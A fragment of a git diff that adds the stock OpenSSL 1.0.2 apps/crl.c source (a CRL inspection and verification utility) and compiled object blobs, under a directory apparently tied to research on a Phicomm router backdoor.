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
M|An@o`F6|yKR=U=XaE2J

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl.c
new file mode 100644
index 0000000..c9c3a5f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl.c
@@ -0,0 +1,442 @@
+/* apps/crl.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/pem.h>
+
+#undef PROG
+#define PROG    crl_main
+
+#undef POSTFIX
+#define POSTFIX ".rvk"
+
+static const char *crl_usage[] = {
+    "usage: crl args\n",
+    "\n",
+    " -inform arg     - input format - default PEM (DER or PEM)\n",
+    " -outform arg    - output format - default PEM\n",
+    " -text           - print out a text format version\n",
+    " -in arg         - input file - default stdin\n",
+    " -out arg        - output file - default stdout\n",
+    " -hash           - print hash value\n",
+#ifndef OPENSSL_NO_MD5
+    " -hash_old       - print old-style (MD5) hash value\n",
+#endif
+    " -fingerprint    - print the crl fingerprint\n",
+    " -issuer         - print issuer DN\n",
+    " -lastupdate     - lastUpdate field\n",
+    " -nextupdate     - nextUpdate field\n",
+    " -crlnumber      - print CRL number\n",
+    " -noout          - no CRL output\n",
+    " -CAfile  name   - verify CRL using certificates in file \"name\"\n",
+    " -CApath  dir    - verify CRL using certificates in \"dir\"\n",
+    " -nameopt arg    - various certificate name options\n",
+    NULL
+};
+
+static BIO *bio_out = NULL;
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    unsigned long nmflag = 0;
+    X509_CRL *x = NULL;
+    char *CAfile = NULL, *CApath = NULL;
+    int ret = 1, i, num, badops = 0, badsig = 0;
+    BIO *out = NULL;
+    int informat, outformat, keyformat;
+    char *infile = NULL, *outfile = NULL, *crldiff = NULL, *keyfile = NULL;
+    int hash = 0, issuer = 0, lastupdate = 0, nextupdate = 0, noout =
+        0, text = 0;
+#ifndef OPENSSL_NO_MD5
+    int hash_old = 0;
+#endif
+    int fingerprint = 0, crlnumber = 0;
+    const char **pp;
+    X509_STORE *store = NULL;
+    X509_STORE_CTX ctx;
+    X509_LOOKUP *lookup = NULL;
+    X509_OBJECT xobj;
+    EVP_PKEY *pkey;
+    int do_ver = 0;
+    const EVP_MD *md_alg, *digest = EVP_sha1();
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    if (bio_out == NULL)
+        if ((bio_out = BIO_new(BIO_s_file())) != NULL) {
+            BIO_set_fp(bio_out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+            {
+                BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+                bio_out = BIO_push(tmpbio, bio_out);
+            }
+#endif
+        }
+
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+    keyformat = FORMAT_PEM;
+
+    argc--;
+    argv++;
+    num = 0;
+    while (argc >= 1) {
+#ifdef undef
+        if (strcmp(*argv, "-p") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!args_from_file(++argv, Nargc, Nargv)) {
+                goto end;
+            }
+        */}
+#endif
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-gendelta") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crldiff = *(++argv);
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyfile = *(++argv);
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-CApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CApath = *(++argv);
+            do_ver = 1;
+        } else if (strcmp(*argv, "-CAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAfile = *(++argv);
+            do_ver = 1;
+        } else if (strcmp(*argv, "-verify") == 0)
+            do_ver = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-hash") == 0)
+            hash = ++num;
+#ifndef OPENSSL_NO_MD5
+        else if (strcmp(*argv, "-hash_old") == 0)
+            hash_old = ++num;
+#endif
+        else if (strcmp(*argv, "-nameopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!set_name_ex(&nmflag, *(++argv)))
+                goto bad;
+        } else if (strcmp(*argv, "-issuer") == 0)
+            issuer = ++num;
+        else if (strcmp(*argv, "-lastupdate") == 0)
+            lastupdate = ++num;
+        else if (strcmp(*argv, "-nextupdate") == 0)
+            nextupdate = ++num;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = ++num;
+        else if (strcmp(*argv, "-fingerprint") == 0)
+            fingerprint = ++num;
+        else if (strcmp(*argv, "-crlnumber") == 0)
+            crlnumber = ++num;
+        else if (strcmp(*argv, "-badsig") == 0)
+            badsig = 1;
+        else if ((md_alg = EVP_get_digestbyname(*argv + 1))) {
+            /* ok */
+            digest = md_alg;
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        for (pp = crl_usage; (*pp != NULL); pp++)
+            BIO_printf(bio_err, "%s", *pp);
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+    x = load_crl(infile, informat);
+    if (x == NULL) {
+        goto end;
+    }
+
+    if (do_ver) {
+        store = X509_STORE_new();
+        lookup = X509_STORE_add_lookup(store, X509_LOOKUP_file());
+        if (lookup == NULL)
+            goto end;
+        if (!X509_LOOKUP_load_file(lookup, CAfile, X509_FILETYPE_PEM))
+            X509_LOOKUP_load_file(lookup, NULL, X509_FILETYPE_DEFAULT);
+
+        lookup = X509_STORE_add_lookup(store, X509_LOOKUP_hash_dir());
+        if (lookup == NULL)
+            goto end;
+        if (!X509_LOOKUP_add_dir(lookup, CApath, X509_FILETYPE_PEM))
+            X509_LOOKUP_add_dir(lookup, NULL, X509_FILETYPE_DEFAULT);
+        ERR_clear_error();
+
+        if (!X509_STORE_CTX_init(&ctx, store, NULL, NULL)) {
+            BIO_printf(bio_err, "Error initialising X509 store\n");
+            goto end;
+        }
+
+        i = X509_STORE_get_by_subject(&ctx, X509_LU_X509,
+                                      X509_CRL_get_issuer(x), &xobj);
+        if (i <= 0) {
+            BIO_printf(bio_err, "Error getting CRL issuer certificate\n");
+            goto end;
+        }
+        pkey = X509_get_pubkey(xobj.data.x509);
+        X509_OBJECT_free_contents(&xobj);
+        if (!pkey) {
+            BIO_printf(bio_err, "Error getting CRL issuer public key\n");
+            goto end;
+        }
+        i = X509_CRL_verify(x, pkey);
+        EVP_PKEY_free(pkey);
+        if (i < 0)
+            goto end;
+        if (i == 0)
+            BIO_printf(bio_err, "verify failure\n");
+        else
+            BIO_printf(bio_err, "verify OK\n");
+    }
+
+    if (crldiff) {
+        X509_CRL *newcrl, *delta;
+        if (!keyfile) {
+            BIO_puts(bio_err, "Missing CRL signing key\n");
+            goto end;
+        }
+        newcrl = load_crl(crldiff, informat);
+        if (!newcrl)
+            goto end;
+        pkey = load_key(bio_err, keyfile, keyformat, 0, NULL, NULL,
+                        "CRL signing key");
+        if (!pkey) {
+            X509_CRL_free(newcrl);
+            goto end;
+        }
+        delta = X509_CRL_diff(x, newcrl, pkey, digest, 0);
+        X509_CRL_free(newcrl);
+        EVP_PKEY_free(pkey);
+        if (delta) {
+            X509_CRL_free(x);
+            x = delta;
+        } else {
+            BIO_puts(bio_err, "Error creating delta CRL\n");
+            goto end;
+        }
+    }
+
+    if (num) {
+        for (i = 1; i <= num; i++) {
+            if (issuer == i) {
+                print_name(bio_out, "issuer=", X509_CRL_get_issuer(x),
+                           nmflag);
+            }
+            if (crlnumber == i) {
+                ASN1_INTEGER *crlnum;
+                crlnum = X509_CRL_get_ext_d2i(x, NID_crl_number, NULL, NULL);
+                BIO_printf(bio_out, "crlNumber=");
+                if (crlnum) {
+                    i2a_ASN1_INTEGER(bio_out, crlnum);
+                    ASN1_INTEGER_free(crlnum);
+                } else
+                    BIO_puts(bio_out, "<NONE>");
+                BIO_printf(bio_out, "\n");
+            }
+            if (hash == i) {
+                BIO_printf(bio_out, "%08lx\n",
+                           X509_NAME_hash(X509_CRL_get_issuer(x)));
+            }
+#ifndef OPENSSL_NO_MD5
+            if (hash_old == i) {
+                BIO_printf(bio_out, "%08lx\n",
+                           X509_NAME_hash_old(X509_CRL_get_issuer(x)));
+            }
+#endif
+            if (lastupdate == i) {
+                BIO_printf(bio_out, "lastUpdate=");
+                ASN1_TIME_print(bio_out, X509_CRL_get_lastUpdate(x));
+                BIO_printf(bio_out, "\n");
+            }
+            if (nextupdate == i) {
+                BIO_printf(bio_out, "nextUpdate=");
+                if (X509_CRL_get_nextUpdate(x))
+                    ASN1_TIME_print(bio_out, X509_CRL_get_nextUpdate(x));
+                else
+                    BIO_printf(bio_out, "NONE");
+                BIO_printf(bio_out, "\n");
+            }
+            if (fingerprint == i) {
+                int j;
+                unsigned int n;
+                unsigned char md[EVP_MAX_MD_SIZE];
+
+                if (!X509_CRL_digest(x, digest, md, &n)) {
+                    BIO_printf(bio_err, "out of memory\n");
+                    goto end;
+                }
+                BIO_printf(bio_out, "%s Fingerprint=",
+                           OBJ_nid2sn(EVP_MD_type(digest)));
+                for (j = 0; j < (int)n; j++) {
+                    BIO_printf(bio_out, "%02X%c", md[j], (j + 1 == (int)n)
+                               ? '\n' : ':');
+                }
+            }
+        }
+    }
+
+    out = BIO_new(BIO_s_file());
+    if (out == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (text)
+        X509_CRL_print(out, x);
+
+    if (noout) {
+        ret = 0;
+        goto end;
+    }
+
+    if (badsig)
+        x->signature->data[x->signature->length - 1] ^= 0x1;
+
+    if (outformat == FORMAT_ASN1)
+        i = (int)i2d_X509_CRL_bio(out, x);
+    else if (outformat == FORMAT_PEM)
+        i = PEM_write_bio_X509_CRL(out, x);
+    else {
+        BIO_printf(bio_err, "bad output format specified for outfile\n");
+        goto end;
+    }
+    if (!i) {
+        BIO_printf(bio_err, "unable to write CRL\n");
+        goto end;
+    }
+    ret = 0;
+ end:
+    if (ret != 0)
+        ERR_print_errors(bio_err);
+    BIO_free_all(out);
+    BIO_free_all(bio_out);
+    bio_out = NULL;
+    X509_CRL_free(x);
+    if (store) {
+        X509_STORE_CTX_cleanup(&ctx);
+        X509_STORE_free(store);
+    }
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl.o
new file mode 100644
index 0000000000000000000000000000000000000000..4fc2b5b85495e2ff45c94b3b1d19494ae150b3da
GIT binary patch
literal 14536
zcmdU#e{>wxb;qA92`d6?6+2)xfIWdV$R)dISF(`+8?B_ZM|kz4vIH`*8LxIn(%P$C
zWp@^&0JVKA5w;t-4k4|ZmV`F=oHURG8rl$k7$r8?E+rwHleQcRBqbc!sKy0)2&752
z_r4#iyQ3YSoRh!$&e@qapZC4@-S=bO%sgpdFtlY^MFmr-f^BAtSBf%rs%0_X&a>^T
zp1Iijt~I|7+#I+mFccUZ%Kmn{o_$|G@L&H9E~0v_YF#5p_3VuM6ae46ezMCwg~o5=
z;TYEQ%nCT@*)DetXZpcSSi~}ZahW|S&(%ov>`8rg-nvN7p%r_g9uCL$z(I&|+}8I2
zznYzQ&FrrQ8|Crpb9h`OJ^Ef+bO*7<v6jLML0=*0`vqK&<F$V9cun9~CFFoak-&Mk
zJU7VmPI(@d=RtYy$1`?AqsnM1gN@-uI%Yu9CF{6Ep4*Y5ZL7*OVP^J>>(FkHgmPEu
za~qI^vS)c)XXi7YEWF^FSplVb?v9$!++NYkf$Vb&pI$2d6pDYg%qE7hxg?Zb$iIsP
zODb4}HV<=~&Kev?eZjp{#lyIps5I=w{8yb_?jYjEg`X^Sxdtn4<|@)M2%sz9TPPHk
z8eD`1%ZS_h{Ox6hyh$&^<kWMbNv)1e`Yus5@g_Zr#NJD;nXi<`xpFwOB2YNdm5sXl
z^LL%IJeuECw){$LX#*DJ(lz?ro$jgP$irPRd-d-Mh5Sb_PnN`4ta&hBS=O_PY&ieM
zIqi4mkDs%=A^-JrmXGHTmMyQ9JriFTT@t*tt$XgS3O@1qdIBp&rd`j$t<9GOsTbvQ
zmx6m}zXwkXU4dtywQOM}-pD*x1G#q06<*+@dgM2Sg0Rfp>DIflVu{hS&tfHw`G)hb
zuZuO!zT}#zMwERA);yT#+;rj9pzlm@w&0riEO_RqJNqm@!wsuvpOXleIM>Weu;A&r
zL3dNoH~)Q%1lB&jU~(1Ix*7{Ap#at_EDvQxgia0*NQbS|A>0ij5}QNhHiz%{PWxU8
z%{}ElOv+@ZV!(GmEP5^oo%%QK{UA|6>Dia{Tz|a`d*6kn!{M9HcXPw1-1mSHSLxZ;
zyVbfc?xY^<wXQ1cgtMXS?_?7T+2g|NE3SJUz`~M&wwBA_eDlKV!8_d=bIm*j)##9K
zRMX!za|96#tfmGQs^^2y177>}IsWYNoeug=_scq<4`FNu^_=By<=$`E(Vcw`C&LQW
zZTS^Eq>#G?#CrCJ5I01xLf2*Nq3o|jbhEEmE1+D@zRIr`8f5gcLJsp!KvzA<2Yb$P
zTfy01xMt5R_L_K9%GhW3@|BKHePO&GjN5j)<E|OJhFpJU9UrjVlo*}T{)3QZ&w(`h
z`%8y2n@b(3{>Ql?M<_Shz++O^Vw4xF+v%ElRKz&$nkhi8a6HiVAFeN~g7q4r8FbAy
z<I2rFhTK!7T~(ZI`8p8ctUZQLVb%GibwY2+YGIDaB5Ng?V?54<3uG0}QRg3mRkhT2
z*@kQS><89z;kC{-Lrdnbw9fyE`?cJ#kl*LN2L?ZseOI*w=3Ci$axchmLc`P(i-NkH
zN@`df;ar#7>T3JYb?82*EHHO-#rNUGsW@6<blP5g{91q=u7A4kdJMxAJms73E{I9D
z@HF01^$fxhuV(T^3KlKV)T{Jd$X)*g-bu&stx6TZEwj&sp^7P(e+A0G({5&+538rT
zmw+^|%pN$kGpk<D4b|(BWqNL)X1}$pPyzUoiVWO6Mg77R$SO<O%F=1#n_pN7{dZ~U
zn2BhIVfk->NQ!Hq6p7)7yYwVq5>UZW&+HlNT3xP<oTyi@h0Af#_Z56+7AoOH{a_t<
